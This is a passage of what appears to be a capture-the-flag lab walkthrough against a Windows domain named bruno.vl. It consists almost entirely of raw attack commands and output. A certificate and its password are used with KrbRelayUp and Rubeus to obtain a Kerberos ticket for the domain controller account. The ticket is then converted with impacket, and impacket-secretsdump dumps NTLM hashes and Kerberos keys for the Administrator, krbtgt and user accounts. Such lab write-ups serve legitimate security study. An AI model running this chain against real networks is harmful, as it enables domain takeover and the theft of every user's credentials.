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
[+] Certificate Password: tL4#hQ9=yQ9$
[+] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[+] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\BRUNODC$'
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::65c9:b4fb:c500:8a8b%6)
[+] Sending S4U2self request to fe80::65c9:b4fb:c500:8a8b%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'BRUNODC$@BRUNO.VL'
[+] Substituting in alternate service name: HOST/BRUNODC
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4192
[+] Ticket successfully imported!
[+] LUID            : 0x3de849
[+] System service should be started in background
PS C:\temp> ./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap
./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: bruno.vl
[*] Using salt: BRUNO.VLhostbrunodc.bruno.vl
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\brunodc$'
[*] Using domain controller: fe80::65c9:b4fb:c500:8a8b%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/bruno.vl
  ServiceRealm             :  BRUNO.VL
  UserName                 :  brunodc$ (NT_PRINCIPAL)
  UserRealm                :  BRUNO.VL
  StartTime                :  6/10/2024 11:45:03 AM
  EndTime                  :  6/10/2024 9:45:03 PM
  RenewTill                :  6/17/2024 11:45:03 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  vdTKMjX5qHweT0c+CbsOSLpJQHmRr0I5Uh/fI0wx5BQ=
  ASREP (key)              :  F312EF7E042FED8F03C8862145DAAD54EC9A2CB14C510C885EADA1BBAF3D5C9B

PS C:\temp> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nano bruno.ticket
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ cat bruno.ticket | base64 -d > bruno.ticket.kirbi
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-ticketConverter bruno.ticket.kirbi bruno.ticket.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ export KRB5CCNAME=bruno.ticket.ccache               
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ klist
Command 'klist' not found, did you mean:
  command 'flist' from deb mmh
  command 'flist' from deb nmh
  command 'mlist' from deb mblaze
Try: sudo apt install <deb name>
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-secretsdump 'brunodc$'@brunodc.bruno.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:137<REDACTED>fd4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:926afc778f7a1406b77513d875520c6f:::
bruno.vl\svc_net:1103:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\svc_scan:1104:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\Chloe.Ball:1106:aad3b435b51404eeaad3b435b51404ee:4efe75a82ece893bd878ca66c04e1cc5:::
bruno.vl\Kayleigh.Patel:1107:aad3b435b51404eeaad3b435b51404ee:821550a6d75171382849d63e3c12dad1:::
bruno.vl\Donna.Harrison:1108:aad3b435b51404eeaad3b435b51404ee:120ca8e1b8d4fecc5d7417b638f30d0c:::
bruno.vl\Charles.Young:1109:aad3b435b51404eeaad3b435b51404ee:3d50f4c837cef7cf5143767553b6cc19:::
bruno.vl\Graeme.Grant:1110:aad3b435b51404eeaad3b435b51404ee:e5b5bc6a01fd48adc0f67a71629b5c19:::
bruno.vl\Natalie.Anderson:1111:aad3b435b51404eeaad3b435b51404ee:880c8cb0afc411db5d4b8a3159577d44:::
bruno.vl\Sam.Owen:1112:aad3b435b51404eeaad3b435b51404ee:830681ca97d7f828f939e5f9cdfed754:::
bruno.vl\Jeremy.Singh:1113:aad3b435b51404eeaad3b435b51404ee:8b1263356938ce9d149f3518e67b9959:::
bruno.vl\Kieran.Day:1114:aad3b435b51404eeaad3b435b51404ee:2f80b61c70a348160f4632cef9a6215b:::
bruno.vl\Hugh.Young:1115:aad3b435b51404eeaad3b435b51404ee:78eef081a8838baca1f2f547ce6f935a:::
BRUNODC$:1000:aad3b435b51404eeaad3b435b51404ee:b8e4490980c8dd1be0d35703bf4bf393:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
krbtgt:aes256-cts-hmac-sha1-96:3b081440c5131b441555f59f7613e2f9ec83ff07c5036bd973f084b14dbe8e46
krbtgt:aes128-cts-hmac-sha1-96:b6d4be2ff14de3b0a557b9f40a563c59
krbtgt:des-cbc-md5:02c8e92313912638
bruno.vl\svc_net:aes256-cts-hmac-sha1-96:cafb9b5775dea822bdb66248e61cf09d003ac8b553ab2d85793f6ea00ea15b91
bruno.vl\svc_net:aes128-cts-hmac-sha1-96:749f1f62dfec1b66a4bcf60a07f6a465
bruno.vl\svc_net:des-cbc-md5:2cfef2a8b57cd907
bruno.vl\svc_scan:aes256-cts-hmac-sha1-96:82e976d9e83a3cfb4a4b5f51567d930ffd1c9c25e76faa1ea137108421ca4426
bruno.vl\svc_scan:aes128-cts-hmac-sha1-96:4e5c05a594239a1516e4a3f59ebf6a13
bruno.vl\svc_scan:des-cbc-md5:46ec4f92a879d61f
bruno.vl\Chloe.Ball:aes256-cts-hmac-sha1-96:47864e8404b82923f404de8ccbf3676dd4793ba12ae85b110d0024b9132f6568
bruno.vl\Chloe.Ball:aes128-cts-hmac-sha1-96:657d98a2af99bc16a1536c5eccb19ae2
bruno.vl\Chloe.Ball:des-cbc-md5:31a2df8ac2f1bf45
bruno.vl\Kayleigh.Patel:aes256-cts-hmac-sha1-96:daf846bbd582cb30d29e5ed2e94ffaf0395c23189f92a3b8c12fc96fbee52314
bruno.vl\Kayleigh.Patel:aes128-cts-hmac-sha1-96:14b06cf39227e426b70ba14442dee40f
bruno.vl\Kayleigh.Patel:des-cbc-md5:1032c4012fd5ae19
